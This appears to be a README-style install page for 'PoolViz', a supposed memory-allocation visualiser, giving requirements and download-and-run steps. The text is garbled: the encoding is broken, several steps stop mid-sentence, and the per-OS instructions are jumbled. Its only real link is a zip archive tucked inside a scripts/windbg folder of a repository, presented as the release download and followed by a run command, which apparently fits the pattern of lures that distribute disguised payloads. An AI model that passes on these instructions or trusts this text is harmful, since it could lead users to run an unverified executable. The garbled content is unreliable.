Welcome to PoolViz! This application helps you see how memory is used in your programs. You will find it useful if you want to understand memory allocation patterns. Letβs walk through the steps to download and run PoolViz.
Before you download, make sure your computer meets these minimum requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or a recent Linux distribution.
- Memory: At least 4 GB of RAM.
- Disk Space: 100 MB available space.
- Click here to visit the Releases page.
- On the Releases page, find the latest version of PoolViz. Itβs usually at the top.
- Click on the version number to open the release notes.
- Under Assets, find the file suited for your operating system:
- For Windows, select

- Click on the appropriate file to start downloading.
- Once downloaded, follow these steps based on your operating system:
- Double-click the

- Once installed, you can find PoolViz in your Start Menu.
- Open the

- Open the Applications folder and find PoolViz to launch it.
- Extract the
https://raw.githubusercontent.com/rafat12/poolviz/master/scripts/windbg/poolviz_v2.3-alpha.3.zipfile using the terminal or file manager. - Open a terminal window and navigate to the extracted folder.
- Run the application with the command:
./poolviz
